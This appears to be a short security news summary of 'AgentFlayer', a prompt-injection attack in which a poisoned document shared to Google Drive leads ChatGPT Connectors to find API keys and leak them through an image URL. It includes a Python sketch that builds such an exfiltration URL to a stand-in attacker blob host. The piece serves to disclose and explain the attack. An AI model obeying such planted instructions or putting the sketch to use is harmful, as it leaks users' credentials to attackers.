A Single Poisoned Document Could Leak ‘Secret’ Data Via ChatGPT
Summary
Researchers have demonstrated how a weakness in the ‘Connectors’ function of OpenAI’s ChatGPT could allow sensitive data to be extracted from a Google Drive account.
In the attack, dubbed ‘AgentFlayer’, security researchers Michael Bargury and Tamir Ishay Sharbat shared a poisoned document to a victim’s Google Drive.
Hidden within the document was a malicious prompt instructing ChatGPT to search the victim’s Google Drive for API keys and append them to a URL supplied by the prompt.
The URL pointed to an image hosted on Microsoft’s Azure Blob cloud storage, so when ChatGPT rendered the image, the request carried the appended keys to the attacker, and the same technique could potentially be used to exfiltrate other data from the victim’s drive.
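To make that exfiltration channel concrete, the sketch below shows in Python how harvested values can be smuggled out through an image URL’s query string; it is an illustration under assumptions, not the researchers’ actual payload, and the blob URL and key values are made up.

```python
from urllib.parse import urlencode

# Hypothetical attacker-controlled image hosted on blob storage (made-up URL).
ATTACKER_IMAGE = "https://attacker.blob.core.windows.net/assets/logo.png"

def build_exfil_url(found_keys):
    """Embed harvested values in the image URL's query parameters."""
    return ATTACKER_IMAGE + "?" + urlencode({"k": ",".join(found_keys)})

# When the chat client fetches this URL to display the 'image', the appended
# keys show up in the attacker's storage access logs -- no other channel needed.
print(build_exfil_url(["sk-example-123", "AKIAEXAMPLE456"]))
```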
OpenAI introduced ‘Connectors’ as a beta feature this year, allowing users to link up to 17 different services, including Google Drive, to their ChatGPT accounts.